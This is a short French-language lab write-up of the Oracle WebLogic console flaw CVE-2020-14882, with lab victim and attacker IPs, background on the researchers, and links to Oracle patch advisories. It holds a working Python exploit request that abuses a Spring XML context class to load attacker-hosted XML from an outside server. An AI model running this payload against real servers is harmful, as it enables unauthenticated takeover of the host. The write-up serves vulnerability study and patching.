
Prise de contrôle du serveur Oracle WebLogic
CVE-2020-14882 est une faille d'exécution de code à distance (RCE) dans le composant Console d'Oracle WebLogic Server. Cette faille sans authentification a reçu une complexité d'attaque « faible » et a été qualifiée de « facilement exploitable » par Oracle, ce qui lui a valu un score CVSSv3 critique de 9,8. Une exploitation réussie permettrait à un attaquant non authentifié de compromettre le serveur Oracle WebLogic via HTTP et de prendre le contrôle total de l'hôte. (En savoir plus - Tenable)
Les versions prises en charge concernées sont 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 et 14.1.1.0.0.
Victime (Serveur WebLogic) : 192.168.0.15 - Windows 10 PRO exécutant WebLogic Server.
Attaquant (Fichier XML hébergé) : 192.168.0.16 - Kali Linux - GNU/Linux - Debian.
Payload :
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)
Ce payload va appeler une bibliothèque XML Spring Framework pour envoyer une requête à un serveur dans le domaine de l'attaquant, cherchant le fichier teste.xml.
Le 28 octobre, un chercheur en sécurité nommé Jang a publié un article de blog (en vietnamien) sur CVE-2020-14882, incluant des détails partiels pouvant être utilisés pour un PoC. Jang n'est pas étranger aux failles WebLogic, ayant été crédité de la découverte et du signalement de CVE-2020-2555 à Oracle, qui a corrigé la vulnérabilité dans sa CPU de janvier 2020. En mars, Jang a confirmé que CVE-2020-2555 n'était pas complètement corrigée. La contournement de CVE-2020-2555 a été divulgué par un autre chercheur, Quynh Le du Centre de sécurité de l'information VNPT (ISC). Le et Jang sont tous deux crédités pour avoir signalé ce contournement, identifié comme CVE-2020-2883. (En savoir plus - Tenable)
Oracle WebLogic : CVE-2020-14882 : Critical Patch Update (Doc ID 2771503.1). (Support Oracle)
Oracle Critical Patch Update Advisory - Octobre 2020. (Support Oracle)
Comment atténuer l'impact de CVE-2020-14882 Weblogic. (Support Oracle)
Vulnérabilité dans le produit Oracle WebLogic Server d'Oracle Fusion Middleware. (Mitre - CVE)